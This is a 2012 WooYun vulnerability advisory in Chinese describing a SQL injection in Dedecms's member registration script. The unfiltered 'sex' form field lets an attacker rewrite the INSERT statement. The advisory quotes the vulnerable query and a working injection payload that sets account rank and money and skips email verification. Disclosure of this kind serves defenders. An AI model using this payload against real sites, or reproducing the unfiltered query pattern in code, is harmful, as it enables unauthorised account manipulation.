当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-06600

漏洞标题:Dedecms SQL注射导致审核机制绕过漏洞

相关厂商:Dedecms

漏洞作者: c4rp3nt3r

提交时间:2012-05-02 11:44

修复时间:2012-06-16 11:45

公开时间:2012-06-16 11:45

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-05-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-06-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Dedecms 存在SQL注射漏洞,在magic_quotes_gpc=off时,攻击者可以将恶意SQL语句带入SQL执行,导致dedecms的审核机制被绕过.

详细说明:

需要magic_quotes_gpc=off,同样没有什么大危害的漏洞.
漏洞代码如下:

我们看 member/reg_new.php的代码 $sex变量在表单是单选,程序员没做任何过滤
191 $inQuery = "INSERT INTO `#@__member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` ,
192 `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` )
193 VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores',
194 '0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); ";
195 if($dsql->ExecuteNoneQuery($inQuery))
我们提交 $sex=boy',100,100,'[email protected]',1000,0,0,'face',0,'',1316751900,'',1316751900,'');%00
直接把rank 跟money都设置为100了等,绕过邮件审核。

漏洞证明:

修复方案:

版权声明:转载请注明来源 c4rp3nt3r@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝